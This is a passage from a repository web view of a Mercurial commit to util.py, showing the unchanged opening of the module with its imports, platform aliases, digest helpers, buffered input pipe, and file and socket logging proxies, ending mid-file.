##// END OF EJS Templates
re2: feed unicode string to re2 module when necessary...
marmoute -
r47597:3ff35382 default draft
parent child Browse files
Show More
@@ -1,3730 +1,3741 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 if pycompat.TYPE_CHECKING:
63 63 from typing import (
64 64 Iterator,
65 65 List,
66 66 Optional,
67 67 Tuple,
68 68 Union,
69 69 )
70 70
71 71
72 72 base85 = policy.importmod('base85')
73 73 osutil = policy.importmod('osutil')
74 74
75 75 b85decode = base85.b85decode
76 76 b85encode = base85.b85encode
77 77
78 78 cookielib = pycompat.cookielib
79 79 httplib = pycompat.httplib
80 80 pickle = pycompat.pickle
81 81 safehasattr = pycompat.safehasattr
82 82 socketserver = pycompat.socketserver
83 83 bytesio = pycompat.bytesio
84 84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 85 stringio = bytesio
86 86 xmlrpclib = pycompat.xmlrpclib
87 87
88 88 httpserver = urllibcompat.httpserver
89 89 urlerr = urllibcompat.urlerr
90 90 urlreq = urllibcompat.urlreq
91 91
92 92 # workaround for win32mbcs
93 93 _filenamebytestr = pycompat.bytestr
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 else:
98 98 from . import posix as platform
99 99
100 100 _ = i18n._
101 101
102 102 bindunixsocket = platform.bindunixsocket
103 103 cachestat = platform.cachestat
104 104 checkexec = platform.checkexec
105 105 checklink = platform.checklink
106 106 copymode = platform.copymode
107 107 expandglobs = platform.expandglobs
108 108 getfsmountpoint = platform.getfsmountpoint
109 109 getfstype = platform.getfstype
110 110 groupmembers = platform.groupmembers
111 111 groupname = platform.groupname
112 112 isexec = platform.isexec
113 113 isowner = platform.isowner
114 114 listdir = osutil.listdir
115 115 localpath = platform.localpath
116 116 lookupreg = platform.lookupreg
117 117 makedir = platform.makedir
118 118 nlinks = platform.nlinks
119 119 normpath = platform.normpath
120 120 normcase = platform.normcase
121 121 normcasespec = platform.normcasespec
122 122 normcasefallback = platform.normcasefallback
123 123 openhardlinks = platform.openhardlinks
124 124 oslink = platform.oslink
125 125 parsepatchoutput = platform.parsepatchoutput
126 126 pconvert = platform.pconvert
127 127 poll = platform.poll
128 128 posixfile = platform.posixfile
129 129 readlink = platform.readlink
130 130 rename = platform.rename
131 131 removedirs = platform.removedirs
132 132 samedevice = platform.samedevice
133 133 samefile = platform.samefile
134 134 samestat = platform.samestat
135 135 setflags = platform.setflags
136 136 split = platform.split
137 137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 138 statisexec = platform.statisexec
139 139 statislink = platform.statislink
140 140 umask = platform.umask
141 141 unlink = platform.unlink
142 142 username = platform.username
143 143
144 144
145 145 def setumask(val):
146 146 # type: (int) -> None
147 147 ''' updates the umask. used by chg server '''
148 148 if pycompat.iswindows:
149 149 return
150 150 os.umask(val)
151 151 global umask
152 152 platform.umask = umask = val & 0o777
153 153
154 154
155 155 # small compat layer
156 156 compengines = compression.compengines
157 157 SERVERROLE = compression.SERVERROLE
158 158 CLIENTROLE = compression.CLIENTROLE
159 159
160 160 try:
161 161 recvfds = osutil.recvfds
162 162 except AttributeError:
163 163 pass
164 164
165 165 # Python compatibility
166 166
167 167 _notset = object()
168 168
169 169
170 170 def bitsfrom(container):
171 171 bits = 0
172 172 for bit in container:
173 173 bits |= bit
174 174 return bits
175 175
176 176
177 177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 178 # to display anything to standard user so detect if we are running test and
179 179 # only use python deprecation warning in this case.
180 180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(
194 194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 195 )
196 196 warnings.filterwarnings(
197 197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 198 )
199 199 # TODO: reinvent imp.is_frozen()
200 200 warnings.filterwarnings(
201 201 'ignore',
202 202 'the imp module is deprecated',
203 203 DeprecationWarning,
204 204 'mercurial',
205 205 )
206 206
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += (
215 215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 216 b" update your code.)"
217 217 ) % version
218 218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 219 # on python 3 with chg, we will need to explicitly flush the output
220 220 sys.stderr.flush()
221 221
222 222
223 223 DIGESTS = {
224 224 b'md5': hashlib.md5,
225 225 b'sha1': hashutil.sha1,
226 226 b'sha512': hashlib.sha512,
227 227 }
228 228 # List of digest types from strongest to weakest
229 229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 assert k in DIGESTS
233 233
234 234
235 235 class digester(object):
236 236 """helper to compute digests.
237 237
238 238 This helper can be used to compute one or more digests given their name.
239 239
240 240 >>> d = digester([b'md5', b'sha1'])
241 241 >>> d.update(b'foo')
242 242 >>> [k for k in sorted(d)]
243 243 ['md5', 'sha1']
244 244 >>> d[b'md5']
245 245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 246 >>> d[b'sha1']
247 247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 248 >>> digester.preferred([b'md5', b'sha1'])
249 249 'sha1'
250 250 """
251 251
252 252 def __init__(self, digests, s=b''):
253 253 self._hashes = {}
254 254 for k in digests:
255 255 if k not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 self._hashes[k] = DIGESTS[k]()
258 258 if s:
259 259 self.update(s)
260 260
261 261 def update(self, data):
262 262 for h in self._hashes.values():
263 263 h.update(data)
264 264
265 265 def __getitem__(self, key):
266 266 if key not in DIGESTS:
267 267 raise error.Abort(_(b'unknown digest type: %s') % k)
268 268 return hex(self._hashes[key].digest())
269 269
270 270 def __iter__(self):
271 271 return iter(self._hashes)
272 272
273 273 @staticmethod
274 274 def preferred(supported):
275 275 """returns the strongest digest type in both supported and DIGESTS."""
276 276
277 277 for k in DIGESTS_BY_STRENGTH:
278 278 if k in supported:
279 279 return k
280 280 return None
281 281
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise error.Abort(
308 308 _(b'size mismatch: expected %d, got %d')
309 309 % (self._size, self._got)
310 310 )
311 311 for k, v in self._digests.items():
312 312 if v != self._digester[k]:
313 313 # i18n: first parameter is a digest name
314 314 raise error.Abort(
315 315 _(b'%s mismatch: expected %s, got %s')
316 316 % (k, v, self._digester[k])
317 317 )
318 318
319 319
320 320 try:
321 321 buffer = buffer # pytype: disable=name-error
322 322 except NameError:
323 323
324 324 def buffer(sliceable, offset=0, length=None):
325 325 if length is not None:
326 326 return memoryview(sliceable)[offset : offset + length]
327 327 return memoryview(sliceable)[offset:]
328 328
329 329
330 330 _chunksize = 4096
331 331
332 332
333 333 class bufferedinputpipe(object):
334 334 """a manually buffered input pipe
335 335
336 336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 337 the same time. We cannot probe the buffer state and select will not detect
338 338 that data are ready to read if they are already buffered.
339 339
340 340 This class let us work around that by implementing its own buffering
341 341 (allowing efficient readline) while offering a way to know if the buffer is
342 342 empty from the output (allowing collaboration of the buffer with polling).
343 343
344 344 This class lives in the 'util' module because it makes use of the 'os'
345 345 module from the python stdlib.
346 346 """
347 347
348 348 def __new__(cls, fh):
349 349 # If we receive a fileobjectproxy, we need to use a variation of this
350 350 # class that notifies observers about activity.
351 351 if isinstance(fh, fileobjectproxy):
352 352 cls = observedbufferedinputpipe
353 353
354 354 return super(bufferedinputpipe, cls).__new__(cls)
355 355
356 356 def __init__(self, input):
357 357 self._input = input
358 358 self._buffer = []
359 359 self._eof = False
360 360 self._lenbuf = 0
361 361
362 362 @property
363 363 def hasbuffer(self):
364 364 """True is any data is currently buffered
365 365
366 366 This will be used externally a pre-step for polling IO. If there is
367 367 already data then no polling should be set in place."""
368 368 return bool(self._buffer)
369 369
370 370 @property
371 371 def closed(self):
372 372 return self._input.closed
373 373
374 374 def fileno(self):
375 375 return self._input.fileno()
376 376
377 377 def close(self):
378 378 return self._input.close()
379 379
380 380 def read(self, size):
381 381 while (not self._eof) and (self._lenbuf < size):
382 382 self._fillbuffer()
383 383 return self._frombuffer(size)
384 384
385 385 def unbufferedread(self, size):
386 386 if not self._eof and self._lenbuf == 0:
387 387 self._fillbuffer(max(size, _chunksize))
388 388 return self._frombuffer(min(self._lenbuf, size))
389 389
390 390 def readline(self, *args, **kwargs):
391 391 if len(self._buffer) > 1:
392 392 # this should not happen because both read and readline end with a
393 393 # _frombuffer call that collapse it.
394 394 self._buffer = [b''.join(self._buffer)]
395 395 self._lenbuf = len(self._buffer[0])
396 396 lfi = -1
397 397 if self._buffer:
398 398 lfi = self._buffer[-1].find(b'\n')
399 399 while (not self._eof) and lfi < 0:
400 400 self._fillbuffer()
401 401 if self._buffer:
402 402 lfi = self._buffer[-1].find(b'\n')
403 403 size = lfi + 1
404 404 if lfi < 0: # end of file
405 405 size = self._lenbuf
406 406 elif len(self._buffer) > 1:
407 407 # we need to take previous chunks into account
408 408 size += self._lenbuf - len(self._buffer[-1])
409 409 return self._frombuffer(size)
410 410
411 411 def _frombuffer(self, size):
412 412 """return at most 'size' data from the buffer
413 413
414 414 The data are removed from the buffer."""
415 415 if size == 0 or not self._buffer:
416 416 return b''
417 417 buf = self._buffer[0]
418 418 if len(self._buffer) > 1:
419 419 buf = b''.join(self._buffer)
420 420
421 421 data = buf[:size]
422 422 buf = buf[len(data) :]
423 423 if buf:
424 424 self._buffer = [buf]
425 425 self._lenbuf = len(buf)
426 426 else:
427 427 self._buffer = []
428 428 self._lenbuf = 0
429 429 return data
430 430
431 431 def _fillbuffer(self, size=_chunksize):
432 432 """read data to the buffer"""
433 433 data = os.read(self._input.fileno(), size)
434 434 if not data:
435 435 self._eof = True
436 436 else:
437 437 self._lenbuf += len(data)
438 438 self._buffer.append(data)
439 439
440 440 return data
441 441
442 442
443 443 def mmapread(fp, size=None):
444 444 if size == 0:
445 445 # size of 0 to mmap.mmap() means "all data"
446 446 # rather than "zero bytes", so special case that.
447 447 return b''
448 448 elif size is None:
449 449 size = 0
450 450 try:
451 451 fd = getattr(fp, 'fileno', lambda: fp)()
452 452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 453 except ValueError:
454 454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 455 # if the file is empty, and if so, return an empty buffer.
456 456 if os.fstat(fd).st_size == 0:
457 457 return b''
458 458 raise
459 459
460 460
461 461 class fileobjectproxy(object):
462 462 """A proxy around file objects that tells a watcher when events occur.
463 463
464 464 This type is intended to only be used for testing purposes. Think hard
465 465 before using it in important code.
466 466 """
467 467
468 468 __slots__ = (
469 469 '_orig',
470 470 '_observer',
471 471 )
472 472
473 473 def __init__(self, fh, observer):
474 474 object.__setattr__(self, '_orig', fh)
475 475 object.__setattr__(self, '_observer', observer)
476 476
477 477 def __getattribute__(self, name):
478 478 ours = {
479 479 '_observer',
480 480 # IOBase
481 481 'close',
482 482 # closed if a property
483 483 'fileno',
484 484 'flush',
485 485 'isatty',
486 486 'readable',
487 487 'readline',
488 488 'readlines',
489 489 'seek',
490 490 'seekable',
491 491 'tell',
492 492 'truncate',
493 493 'writable',
494 494 'writelines',
495 495 # RawIOBase
496 496 'read',
497 497 'readall',
498 498 'readinto',
499 499 'write',
500 500 # BufferedIOBase
501 501 # raw is a property
502 502 'detach',
503 503 # read defined above
504 504 'read1',
505 505 # readinto defined above
506 506 # write defined above
507 507 }
508 508
509 509 # We only observe some methods.
510 510 if name in ours:
511 511 return object.__getattribute__(self, name)
512 512
513 513 return getattr(object.__getattribute__(self, '_orig'), name)
514 514
515 515 def __nonzero__(self):
516 516 return bool(object.__getattribute__(self, '_orig'))
517 517
518 518 __bool__ = __nonzero__
519 519
520 520 def __delattr__(self, name):
521 521 return delattr(object.__getattribute__(self, '_orig'), name)
522 522
523 523 def __setattr__(self, name, value):
524 524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525 525
526 526 def __iter__(self):
527 527 return object.__getattribute__(self, '_orig').__iter__()
528 528
529 529 def _observedcall(self, name, *args, **kwargs):
530 530 # Call the original object.
531 531 orig = object.__getattribute__(self, '_orig')
532 532 res = getattr(orig, name)(*args, **kwargs)
533 533
534 534 # Call a method on the observer of the same name with arguments
535 535 # so it can react, log, etc.
536 536 observer = object.__getattribute__(self, '_observer')
537 537 fn = getattr(observer, name, None)
538 538 if fn:
539 539 fn(res, *args, **kwargs)
540 540
541 541 return res
542 542
543 543 def close(self, *args, **kwargs):
544 544 return object.__getattribute__(self, '_observedcall')(
545 545 'close', *args, **kwargs
546 546 )
547 547
548 548 def fileno(self, *args, **kwargs):
549 549 return object.__getattribute__(self, '_observedcall')(
550 550 'fileno', *args, **kwargs
551 551 )
552 552
553 553 def flush(self, *args, **kwargs):
554 554 return object.__getattribute__(self, '_observedcall')(
555 555 'flush', *args, **kwargs
556 556 )
557 557
558 558 def isatty(self, *args, **kwargs):
559 559 return object.__getattribute__(self, '_observedcall')(
560 560 'isatty', *args, **kwargs
561 561 )
562 562
563 563 def readable(self, *args, **kwargs):
564 564 return object.__getattribute__(self, '_observedcall')(
565 565 'readable', *args, **kwargs
566 566 )
567 567
568 568 def readline(self, *args, **kwargs):
569 569 return object.__getattribute__(self, '_observedcall')(
570 570 'readline', *args, **kwargs
571 571 )
572 572
573 573 def readlines(self, *args, **kwargs):
574 574 return object.__getattribute__(self, '_observedcall')(
575 575 'readlines', *args, **kwargs
576 576 )
577 577
578 578 def seek(self, *args, **kwargs):
579 579 return object.__getattribute__(self, '_observedcall')(
580 580 'seek', *args, **kwargs
581 581 )
582 582
583 583 def seekable(self, *args, **kwargs):
584 584 return object.__getattribute__(self, '_observedcall')(
585 585 'seekable', *args, **kwargs
586 586 )
587 587
588 588 def tell(self, *args, **kwargs):
589 589 return object.__getattribute__(self, '_observedcall')(
590 590 'tell', *args, **kwargs
591 591 )
592 592
593 593 def truncate(self, *args, **kwargs):
594 594 return object.__getattribute__(self, '_observedcall')(
595 595 'truncate', *args, **kwargs
596 596 )
597 597
598 598 def writable(self, *args, **kwargs):
599 599 return object.__getattribute__(self, '_observedcall')(
600 600 'writable', *args, **kwargs
601 601 )
602 602
603 603 def writelines(self, *args, **kwargs):
604 604 return object.__getattribute__(self, '_observedcall')(
605 605 'writelines', *args, **kwargs
606 606 )
607 607
608 608 def read(self, *args, **kwargs):
609 609 return object.__getattribute__(self, '_observedcall')(
610 610 'read', *args, **kwargs
611 611 )
612 612
613 613 def readall(self, *args, **kwargs):
614 614 return object.__getattribute__(self, '_observedcall')(
615 615 'readall', *args, **kwargs
616 616 )
617 617
618 618 def readinto(self, *args, **kwargs):
619 619 return object.__getattribute__(self, '_observedcall')(
620 620 'readinto', *args, **kwargs
621 621 )
622 622
623 623 def write(self, *args, **kwargs):
624 624 return object.__getattribute__(self, '_observedcall')(
625 625 'write', *args, **kwargs
626 626 )
627 627
628 628 def detach(self, *args, **kwargs):
629 629 return object.__getattribute__(self, '_observedcall')(
630 630 'detach', *args, **kwargs
631 631 )
632 632
633 633 def read1(self, *args, **kwargs):
634 634 return object.__getattribute__(self, '_observedcall')(
635 635 'read1', *args, **kwargs
636 636 )
637 637
638 638
639 639 class observedbufferedinputpipe(bufferedinputpipe):
640 640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641 641
642 642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 643 bypass ``fileobjectproxy``. Because of this, we need to make
644 644 ``bufferedinputpipe`` aware of these operations.
645 645
646 646 This variation of ``bufferedinputpipe`` can notify observers about
647 647 ``os.read()`` events. It also re-publishes other events, such as
648 648 ``read()`` and ``readline()``.
649 649 """
650 650
651 651 def _fillbuffer(self):
652 652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653 653
654 654 fn = getattr(self._input._observer, 'osread', None)
655 655 if fn:
656 656 fn(res, _chunksize)
657 657
658 658 return res
659 659
660 660 # We use different observer methods because the operation isn't
661 661 # performed on the actual file object but on us.
662 662 def read(self, size):
663 663 res = super(observedbufferedinputpipe, self).read(size)
664 664
665 665 fn = getattr(self._input._observer, 'bufferedread', None)
666 666 if fn:
667 667 fn(res, size)
668 668
669 669 return res
670 670
671 671 def readline(self, *args, **kwargs):
672 672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673 673
674 674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 675 if fn:
676 676 fn(res)
677 677
678 678 return res
679 679
680 680
681 681 PROXIED_SOCKET_METHODS = {
682 682 'makefile',
683 683 'recv',
684 684 'recvfrom',
685 685 'recvfrom_into',
686 686 'recv_into',
687 687 'send',
688 688 'sendall',
689 689 'sendto',
690 690 'setblocking',
691 691 'settimeout',
692 692 'gettimeout',
693 693 'setsockopt',
694 694 }
695 695
696 696
697 697 class socketproxy(object):
698 698 """A proxy around a socket that tells a watcher when events occur.
699 699
700 700 This is like ``fileobjectproxy`` except for sockets.
701 701
702 702 This type is intended to only be used for testing purposes. Think hard
703 703 before using it in important code.
704 704 """
705 705
706 706 __slots__ = (
707 707 '_orig',
708 708 '_observer',
709 709 )
710 710
711 711 def __init__(self, sock, observer):
712 712 object.__setattr__(self, '_orig', sock)
713 713 object.__setattr__(self, '_observer', observer)
714 714
715 715 def __getattribute__(self, name):
716 716 if name in PROXIED_SOCKET_METHODS:
717 717 return object.__getattribute__(self, name)
718 718
719 719 return getattr(object.__getattribute__(self, '_orig'), name)
720 720
721 721 def __delattr__(self, name):
722 722 return delattr(object.__getattribute__(self, '_orig'), name)
723 723
724 724 def __setattr__(self, name, value):
725 725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726 726
727 727 def __nonzero__(self):
728 728 return bool(object.__getattribute__(self, '_orig'))
729 729
730 730 __bool__ = __nonzero__
731 731
732 732 def _observedcall(self, name, *args, **kwargs):
733 733 # Call the original object.
734 734 orig = object.__getattribute__(self, '_orig')
735 735 res = getattr(orig, name)(*args, **kwargs)
736 736
737 737 # Call a method on the observer of the same name with arguments
738 738 # so it can react, log, etc.
739 739 observer = object.__getattribute__(self, '_observer')
740 740 fn = getattr(observer, name, None)
741 741 if fn:
742 742 fn(res, *args, **kwargs)
743 743
744 744 return res
745 745
746 746 def makefile(self, *args, **kwargs):
747 747 res = object.__getattribute__(self, '_observedcall')(
748 748 'makefile', *args, **kwargs
749 749 )
750 750
751 751 # The file object may be used for I/O. So we turn it into a
752 752 # proxy using our observer.
753 753 observer = object.__getattribute__(self, '_observer')
754 754 return makeloggingfileobject(
755 755 observer.fh,
756 756 res,
757 757 observer.name,
758 758 reads=observer.reads,
759 759 writes=observer.writes,
760 760 logdata=observer.logdata,
761 761 logdataapis=observer.logdataapis,
762 762 )
763 763
764 764 def recv(self, *args, **kwargs):
765 765 return object.__getattribute__(self, '_observedcall')(
766 766 'recv', *args, **kwargs
767 767 )
768 768
769 769 def recvfrom(self, *args, **kwargs):
770 770 return object.__getattribute__(self, '_observedcall')(
771 771 'recvfrom', *args, **kwargs
772 772 )
773 773
774 774 def recvfrom_into(self, *args, **kwargs):
775 775 return object.__getattribute__(self, '_observedcall')(
776 776 'recvfrom_into', *args, **kwargs
777 777 )
778 778
779 779 def recv_into(self, *args, **kwargs):
780 780 return object.__getattribute__(self, '_observedcall')(
781 781 'recv_info', *args, **kwargs
782 782 )
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, '_observedcall')(
786 786 'send', *args, **kwargs
787 787 )
788 788
789 789 def sendall(self, *args, **kwargs):
790 790 return object.__getattribute__(self, '_observedcall')(
791 791 'sendall', *args, **kwargs
792 792 )
793 793
794 794 def sendto(self, *args, **kwargs):
795 795 return object.__getattribute__(self, '_observedcall')(
796 796 'sendto', *args, **kwargs
797 797 )
798 798
799 799 def setblocking(self, *args, **kwargs):
800 800 return object.__getattribute__(self, '_observedcall')(
801 801 'setblocking', *args, **kwargs
802 802 )
803 803
804 804 def settimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, '_observedcall')(
806 806 'settimeout', *args, **kwargs
807 807 )
808 808
809 809 def gettimeout(self, *args, **kwargs):
810 810 return object.__getattribute__(self, '_observedcall')(
811 811 'gettimeout', *args, **kwargs
812 812 )
813 813
814 814 def setsockopt(self, *args, **kwargs):
815 815 return object.__getattribute__(self, '_observedcall')(
816 816 'setsockopt', *args, **kwargs
817 817 )
818 818
819 819
820 820 class baseproxyobserver(object):
821 821 def __init__(self, fh, name, logdata, logdataapis):
822 822 self.fh = fh
823 823 self.name = name
824 824 self.logdata = logdata
825 825 self.logdataapis = logdataapis
826 826
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write(b'\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 838 else:
839 839 self.fh.write(
840 840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 841 )
842 842 self.fh.flush()
843 843 return
844 844
845 845 # Data with newlines is written to multiple lines.
846 846 if self.logdataapis:
847 847 self.fh.write(b':\n')
848 848
849 849 lines = data.splitlines(True)
850 850 for line in lines:
851 851 self.fh.write(
852 852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 853 )
854 854 self.fh.flush()
855 855
856 856
857 857 class fileobjectobserver(baseproxyobserver):
858 858 """Logs file object activity."""
859 859
860 860 def __init__(
861 861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 862 ):
863 863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 864 self.reads = reads
865 865 self.writes = writes
866 866
867 867 def read(self, res, size=-1):
868 868 if not self.reads:
869 869 return
870 870 # Python 3 can return None from reads at EOF instead of empty strings.
871 871 if res is None:
872 872 res = b''
873 873
874 874 if size == -1 and res == b'':
875 875 # Suppress pointless read(-1) calls that return
876 876 # nothing. These happen _a lot_ on Python 3, and there
877 877 # doesn't seem to be a better workaround to have matching
878 878 # Python 2 and 3 behavior. :(
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883 883
884 884 self._writedata(res)
885 885
886 886 def readline(self, res, limit=-1):
887 887 if not self.reads:
888 888 return
889 889
890 890 if self.logdataapis:
891 891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892 892
893 893 self._writedata(res)
894 894
895 895 def readinto(self, res, dest):
896 896 if not self.reads:
897 897 return
898 898
899 899 if self.logdataapis:
900 900 self.fh.write(
901 901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 902 )
903 903
904 904 data = dest[0:res] if res is not None else b''
905 905
906 906 # _writedata() uses "in" operator and is confused by memoryview because
907 907 # characters are ints on Python 3.
908 908 if isinstance(data, memoryview):
909 909 data = data.tobytes()
910 910
911 911 self._writedata(data)
912 912
913 913 def write(self, res, data):
914 914 if not self.writes:
915 915 return
916 916
917 917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 918 # returns the integer bytes written.
919 919 if res is None and data:
920 920 res = len(data)
921 921
922 922 if self.logdataapis:
923 923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924 924
925 925 self._writedata(data)
926 926
927 927 def flush(self, res):
928 928 if not self.writes:
929 929 return
930 930
931 931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932 932
933 933 # For observedbufferedinputpipe.
934 934 def bufferedread(self, res, size):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945 def bufferedreadline(self, res):
946 946 if not self.reads:
947 947 return
948 948
949 949 if self.logdataapis:
950 950 self.fh.write(
951 951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 952 )
953 953
954 954 self._writedata(res)
955 955
956 956
957 957 def makeloggingfileobject(
958 958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 959 ):
960 960 """Turn a file object into a logging file object."""
961 961
962 962 observer = fileobjectobserver(
963 963 logh,
964 964 name,
965 965 reads=reads,
966 966 writes=writes,
967 967 logdata=logdata,
968 968 logdataapis=logdataapis,
969 969 )
970 970 return fileobjectproxy(fh, observer)
971 971
972 972
973 973 class socketobserver(baseproxyobserver):
974 974 """Logs socket activity."""
975 975
976 976 def __init__(
977 977 self,
978 978 fh,
979 979 name,
980 980 reads=True,
981 981 writes=True,
982 982 states=True,
983 983 logdata=False,
984 984 logdataapis=True,
985 985 ):
986 986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 987 self.reads = reads
988 988 self.writes = writes
989 989 self.states = states
990 990
991 991 def makefile(self, res, mode=None, bufsize=None):
992 992 if not self.states:
993 993 return
994 994
995 995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996 996
997 997 def recv(self, res, size, flags=0):
998 998 if not self.reads:
999 999 return
1000 1000
1001 1001 if self.logdataapis:
1002 1002 self.fh.write(
1003 1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 1004 )
1005 1005 self._writedata(res)
1006 1006
1007 1007 def recvfrom(self, res, size, flags=0):
1008 1008 if not self.reads:
1009 1009 return
1010 1010
1011 1011 if self.logdataapis:
1012 1012 self.fh.write(
1013 1013 b'%s> recvfrom(%d, %d) -> %d'
1014 1014 % (self.name, size, flags, len(res[0]))
1015 1015 )
1016 1016
1017 1017 self._writedata(res[0])
1018 1018
1019 1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 1020 if not self.reads:
1021 1021 return
1022 1022
1023 1023 if self.logdataapis:
1024 1024 self.fh.write(
1025 1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 1026 % (self.name, size, flags, res[0])
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0 : res[0]])
1030 1030
1031 1031 def recv_into(self, res, buf, size=0, flags=0):
1032 1032 if not self.reads:
1033 1033 return
1034 1034
1035 1035 if self.logdataapis:
1036 1036 self.fh.write(
1037 1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 1038 )
1039 1039
1040 1040 self._writedata(buf[0:res])
1041 1041
1042 1042 def send(self, res, data, flags=0):
1043 1043 if not self.writes:
1044 1044 return
1045 1045
1046 1046 self.fh.write(
1047 1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 1048 )
1049 1049 self._writedata(data)
1050 1050
1051 1051 def sendall(self, res, data, flags=0):
1052 1052 if not self.writes:
1053 1053 return
1054 1054
1055 1055 if self.logdataapis:
1056 1056 # Returns None on success. So don't bother reporting return value.
1057 1057 self.fh.write(
1058 1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 1059 )
1060 1060
1061 1061 self._writedata(data)
1062 1062
1063 1063 def sendto(self, res, data, flagsoraddress, address=None):
